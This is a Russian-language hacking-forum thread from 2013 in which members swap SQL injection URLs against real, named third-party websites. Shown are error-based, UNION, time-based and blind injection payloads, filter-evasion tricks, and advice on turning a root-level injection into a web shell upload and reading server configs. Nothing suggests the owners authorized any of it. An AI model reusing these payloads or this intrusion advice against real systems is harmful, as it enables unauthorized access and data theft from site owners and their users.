Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Вы уверены, что вам надо перебирать именно так, если возможно решить задачу более-результативным путем?

    К примеру получаем вывод имени базы данных через error-based, но немного другого типа:
    PHP:
    http://ukrcrewing.com.ua/agency%27or%201%20group%20by%20concat%28database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20--%20
     
    #22461 randman, 1 Sep 2013
    Last edited: 1 Sep 2013
  2. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Интересная SQL
    Code:
    seafarer.od.ua/?page=study&course=[COLOR=Red]2+order+by+7+--+[/COLOR]
    Но при операторах UNION+SELECT выдаёт ошибку будто кол-во столбцов неверно.
     
  3. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 103 group in /var/www/lesozavodsk/study.inc on line 11
    PHP:
    http://seafarer.od.ua/?page=study&course=2+union+select+1,2,3,4,5,6,7+from+rdb$relations+--+
     
    #22463 randman, 2 Sep 2013
    Last edited: 2 Sep 2013
  4. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    нужно обойти фильтр не понятно на что, толи TABLE_NAME; INFORMATION_SCHEMA
    Code:
    http://www.web-compas.ru/c.php?id=-34%27+union+/*!select*/+1,version%28%29,3,4,5,6,7+--+
    на select вроде обошёл
     
  5. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652

    Мысль у тебя правильная:

     
  6. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Точно, мне показалось, что дальше не прокатит .. :)
    Я вот ещё нашёл
    Code:
    http://tochka.cn.ua/index.php?cat=0%27+order+by+9+--+
    http://www.autoonline.com.ua/news/index.php?id=4736+order+by+9+--+
    но при UNION+SELECT = показывает обычную страницу даже есть кол-во столбцов я увеличу.
     
    #22466 Unknowhacker, 3 Sep 2013
    Last edited: 3 Sep 2013
  7. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Здесь time based
    http://www.autoonline.com.ua/news/index.php?id=4736+/*!and*/+/*!if(substr(version(),1,1)=5,SLEEP(5),1)*/+--+
     
    1 person likes this.
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    мммм,зачем тайм..

     
    _________________________
    #22468 HAXTA4OK, 3 Sep 2013
    Last edited: 3 Sep 2013
    4 people like this.
  9. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    HATA4OK, спасибо, но я уже сделал по другому.
    Code:
    http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+/*!union*/+/*!select*/+1,2+--+
    Мне не даёт покоя эта ссылка, но как я не крутил не выводится номер столбца -(
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    И не выведешь. Тут слепая скуля.

    Кстати тут удобно использовать метод more1row

    Смотри сам:

    Code:
    http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=[COLOR=Yellow]4[/COLOR],1,(select+1+union+select+2))
    
    [COLOR=Yellow]No error[/COLOR]
    
    http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=[COLOR=Yellow]5[/COLOR],1,(select+1+union+select+2))
    
    [COLOR=Yellow]Error[/COLOR]
     
    _________________________
    #22470 BigBear, 4 Sep 2013
    Last edited: 4 Sep 2013
  11. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    А тем более с четвёрки не вытащишь -(
    Кто может сказать, что за реагирование на *1
    Code:
    http://pereprava.com.ua/index.php?id=1*1
     
  12. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652


    http://pereprava.com.ua/index.php?id=1*1 (Вывод страницы 1)
    http://pereprava.com.ua/index.php?id=1*3 (Вывод страницы 3)

    Отсюда следует,что, ВОЗМОЖНО, здесь присутствует инъекция
     
  13. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Очередной фильтр SELECT
    Code:
    http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+
    но зараза оператора AND никак не хочет пропускать /*!and*/ и методом more1row воспользоваться не получится.
     
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Так используйте что ни будь еще - логические операторы, арифметические, побитовые, сравнения...

    Там, помимо основного WAF-а еще несколько фильтров, что они только не фильтруют...

    Возможно такой синтаксис:
    PHP:
    130++div+++((5)+&255)+
    Но до раскрутки еще далеко, с полным фильтром на select ничего не получится.
     
    #22474 randman, 5 Sep 2013
    Last edited: 5 Sep 2013
    1 person likes this.
  15. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
    зы /administrator/ 403, не залиться
     
  16. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Возможно прав нет, в большинстве случаев залиться можно только тогда, когда на какую то диру стоять права записи для others, например 777 и сервер в ней что-то исполняет - PHP, SSI, etc...

    Надо что-то другое использовать - прочтите виртуальные хосты, другие файлы, конфиги, ищите там полезную инфу...
     
    2 people like this.
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    Если стоит sape, то у них в корне сайта должна быть врайтабельная директория для скриптов сапы, правда закрытая на исполнение .htaccess -ом. Попробуй.
     
    _________________________
    1 person likes this.
  18. narviss

    narviss New Member

    Joined:
    1 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Можно ли что сделать с этой уязвимостью?
     
  19. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?
     
  20. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    %Inject_Here%


    http://www.itsecteam.com/files/havij/havij_help-english.pdf
     
    2 people like this.
Thread Status:
Not open for further replies.